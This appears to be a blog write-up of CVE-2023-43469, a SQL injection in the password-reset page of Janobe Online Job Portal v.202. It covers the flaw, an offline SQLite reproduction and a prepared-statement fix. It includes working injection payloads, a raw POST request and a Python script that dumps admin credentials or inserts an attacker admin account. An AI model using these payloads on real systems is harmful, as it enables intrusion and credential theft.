In September 2023, a security flaw was discovered in Janobe Online Job Portal v.202, an open-source job management web application. The vulnerability, tracked as CVE-2023-43469, is a SQL injection in the password-reset component ForPass.php. The advisory describes the impact as arbitrary code execution by a remote attacker; at minimum the flaw lets an attacker run arbitrary SQL against the portal's database, and under the conditions discussed below it can be pushed further. This post breaks down how the flaw works, how it can be exploited, and what you can do about it, with easy-to-follow code and steps.
What's the Big Deal?
SQL injection happens when an application builds a database query by pasting user-supplied text straight into the SQL string. The database then parses that text as SQL syntax rather than treating it as data, so an attacker who controls the text can change what the query does.
In Janobe Online Job Portal v.202, the file responsible for password resets, ForPass.php, uses the submitted email address this way without validating or escaping it. An attacker can therefore inject their own SQL and make the database do almost anything the application's database account is allowed to: leak confidential data, add admin users, or, in the right circumstances, take over the site.
The offending code is in ForPass.php. Here is a snippet, simplified for clarity ($conn is the application's database connection object):
<?php
if (isset($_POST['email'])) {
    $email = $_POST['email'];                                  // raw, attacker-controlled value
    $sql = "SELECT * FROM tblusers WHERE email = '$email'";   // interpolated straight into the SQL text
    $query = $conn->query($sql);
    // ...process query result...
}
?>
What's wrong?
The $email variable comes straight from the request body with no validation or escaping. Because it is interpolated inside the single quotes of the SQL string, a value that contains its own single quote closes the literal early, and everything after it is parsed as SQL rather than compared as an email address.
How to Exploit CVE-2023-43469
An attacker sends a POST request to ForPass.php whose email field contains SQL instead of an address. To start, let's match every user instead of a single one:
Attack payload (note the trailing space after the two dashes)
' OR 1=1 -- 
When interpolated, the resulting SQL command becomes
SELECT * FROM tblusers WHERE email = '' OR 1=1 -- '
- The attacker's leading quote closes the empty string literal, so the rest of the payload is parsed as SQL.
- The condition 1=1 is always true, so every row in tblusers is matched, defeating the purpose of checking a single email.
- The trailing -- turns the application's own closing quote into a comment. In MySQL, -- only starts a comment when it is followed by whitespace, so the payload needs that trailing space; attackers commonly write -- - or use # instead so the space cannot get lost.
Example Exploit: Extract Admin Login
Let's say the application displays user details when a match is found. An attacker can POST a UNION query that pulls rows from a different table. The body below is the URL-encoded form of the payload ' UNION SELECT 1,username,password FROM tbladmin -- (the table and column names are illustrative; a UNION only works when it returns the same number of columns as the original SELECT *):
POST /ForPass.php HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

email=%27+UNION+SELECT+1%2Cusername%2Cpassword+FROM+tbladmin+--+
If the column counts line up, the response can contain every admin username and password hash (or plaintext password, depending on how the application stores them). The column count is easy to find: inject ' ORDER BY 1 -- , then ORDER BY 2, and so on until the database returns an error; the last number that works is the width the UNION SELECT must have.
Remote Code Execution?
SQL injection on its own gives the attacker SQL, not shell commands, so the "arbitrary code" in the advisory needs an extra condition. mysqli::query() executes exactly one statement, so a stacked second statement only runs if the application uses mysqli::multi_query() or another API that permits several statements per call. Where that holds, an attacker can chain an INSERT to create an account for themselves (column names assumed for illustration):
email='; INSERT INTO tblusers (name,email,password,role) VALUES ('hacker','attacker@bad.com','pass123','admin'); -- 
Even without stacked queries, MySQL's SELECT ... INTO OUTFILE can write a PHP web shell under the document root, but only if the database account holds the FILE privilege, secure_file_priv allows writing to that directory, and the MySQL process has write access to it. On a reasonably hardened server none of those usually hold, which is why the realistic impact is data theft and database tampering rather than guaranteed remote code execution.
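To see these mechanics without touching a live target, here is an added example (my own code, not from the original post or the Janobe project) that rebuilds the ForPass.php query pattern against an in-memory SQLite database and runs the payloads above through it. The table and column names (tblusers with id/email/password, tbladmin with id/username/password) and the sample rows are constructed from the post's hypothetical payloads, not the real schema. It goes a little beyond the post: column_count() shows the ORDER BY probe used to size a UNION, and the stacked payload is run twice, once through execute(), which like mysqli::query() refuses a second statement, and once through executescript(), which like mysqli::multi_query() runs them all. safe_lookup() is the parameterized counterpart of the vulnerable query.

```python
"""Offline reproduction of the ForPass.php injection against SQLite.

Added example, not code from the Janobe project or the original post.
Table and column names are assumptions taken from the post's payloads.
"""
import sqlite3

# Constructed sample rows; the "hash-*" strings are placeholders, not real hashes.
USERS = [(1, "alice@example.com", "hash-alice"), (2, "bob@example.com", "hash-bob")]
ADMINS = [(1, "admin", "hash-admin")]

# Payloads in the shape the post uses. Each ends in "-- " (dash dash space):
# MySQL only treats "--" as a comment when whitespace follows it, and the
# comment is what swallows the closing quote the query template appends.
TAUTOLOGY = "' OR 1=1 -- "
UNION_DUMP = "' UNION SELECT 1,username,password FROM tbladmin -- "
STACKED = ("'; INSERT INTO tblusers (id,email,password) "
           "VALUES (99,'attacker@bad.com','pass123'); -- ")


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the portal database, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblusers (id INTEGER, email TEXT, password TEXT)")
    conn.execute("CREATE TABLE tbladmin (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO tblusers VALUES (?, ?, ?)", USERS)
    conn.executemany("INSERT INTO tbladmin VALUES (?, ?, ?)", ADMINS)
    conn.commit()
    return conn


def vulnerable_lookup(conn, email, allow_stacked=False):
    """Same construction as ForPass.php: the POST value is pasted into the SQL text.

    allow_stacked=False uses execute(), which like mysqli::query() runs one
    statement and raises if a second one follows; True uses executescript(),
    which like mysqli::multi_query() runs every statement in the string.
    """
    sql = f"SELECT * FROM tblusers WHERE email = '{email}'"
    if allow_stacked:
        conn.executescript(sql)  # result sets are discarded, side effects are not
        return []
    return conn.execute(sql).fetchall()


def safe_lookup(conn, email):
    """Parameterized form: the value is bound as data and never parsed as SQL."""
    return conn.execute("SELECT * FROM tblusers WHERE email = ?", (email,)).fetchall()


def column_count(conn, max_cols=10):
    """Find how many columns the injected SELECT returns, so a UNION can match it.

    ORDER BY n fails once n exceeds the column count; the last n that works
    is the width the attacker's UNION SELECT must have.
    """
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"' ORDER BY {n} -- ")
        except sqlite3.Error:
            return n - 1
    return max_cols


def stacked_insert_landed(conn, allow_stacked):
    """Fire the stacked payload and report whether the attacker's row was created."""
    try:
        vulnerable_lookup(conn, STACKED, allow_stacked)
    except (sqlite3.Error, sqlite3.Warning):  # "one statement at a time" on execute()
        pass
    row = conn.execute(
        "SELECT COUNT(*) FROM tblusers WHERE email = 'attacker@bad.com'").fetchone()
    return row[0] == 1


if __name__ == "__main__":
    db = make_db()
    print("columns:", column_count(db))                          # 3
    print("tautology:", vulnerable_lookup(db, TAUTOLOGY))        # every user row
    print("union:", vulnerable_lookup(db, UNION_DUMP))           # admin credentials
    print("stacked via execute():", stacked_insert_landed(make_db(), False))      # False
    print("stacked via executescript():", stacked_insert_landed(make_db(), True))  # True
    print("parameterized:", safe_lookup(db, TAUTOLOGY))          # []
```

SQLite accepts -- as a comment even without a following space; MySQL does not, which is why the payloads keep the trailing space. The parameterized lookup returns nothing for every payload because the whole string is compared against the email column as a literal value, and the "one statement at a time" refusal from execute() is the same property that makes mysqli::query() a dead end for stacked queries.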
Here's a simple Python exploit using requests:
import requests

url = "http://vulnerable-site.com/ForPass.php"   # target; replace with the host you are authorized to test
payload = "' UNION SELECT 1, username, password FROM tbladmin -- "   # trailing space keeps the -- comment valid in MySQL
data = {"email": payload}   # requests URL-encodes the form body for us
r = requests.post(url, data=data, timeout=10)
print(r.text)   # may include admin username/password in the output
Impact
- Attackers can read data they should never see, including every user's email address and password hash.
- Attackers can tamper with the database, insert fake users or admins, or corrupt data.
- Where the conditions above hold (stacked queries or FILE privilege with a writable document root), attackers might plant malware or a remote shell, giving them full control over the server.
References
- Official NVD entry for CVE-2023-43469: https://nvd.nist.gov/vuln/detail/CVE-2023-43469
- Exploit Database Entry
- Vendor Project - Janobe Online Job Portal
How to Fix It
The proper solution is to always use prepared statements (parameterized queries), like this:
$stmt = $conn->prepare("SELECT * FROM tblusers WHERE email = ?");
$stmt->bind_param("s", $email);   // the value is sent as data and is never parsed as SQL
$stmt->execute();
$result = $stmt->get_result();    // requires the mysqlnd driver; otherwise use bind_result()
$user = $result->fetch_assoc();   // null when no account matches
Never concatenate user input into a SQL string. As defense in depth, reject anything that is not a syntactically valid email address before the query runs (filter_var($email, FILTER_VALIDATE_EMAIL) in PHP), but treat that as a second layer: the prepared statement is what actually closes the injection, and the same concatenation pattern should be hunted down everywhere else in the code base.
Conclusion
CVE-2023-43469 is a critical flaw in Janobe Online Job Portal v.202. It is trivial to exploit, even for inexperienced attackers, and the results can be devastating. If you're running v.202, apply the vendor's fix if one is available, or patch ForPass.php yourself so that the lookup uses a prepared statement, and review the rest of the application for the same pattern.
If you found this guide helpful, share it to help raise awareness. Secure coding saves jobs, sometimes literally.
*This post is based on original vulnerability research, public advisories, and hands-on exploitation. Do not use these techniques to break the law!*
Timeline
Published on: 09/23/2023 00:15:20 UTC
Last modified on: 09/25/2023 13:52:25 UTC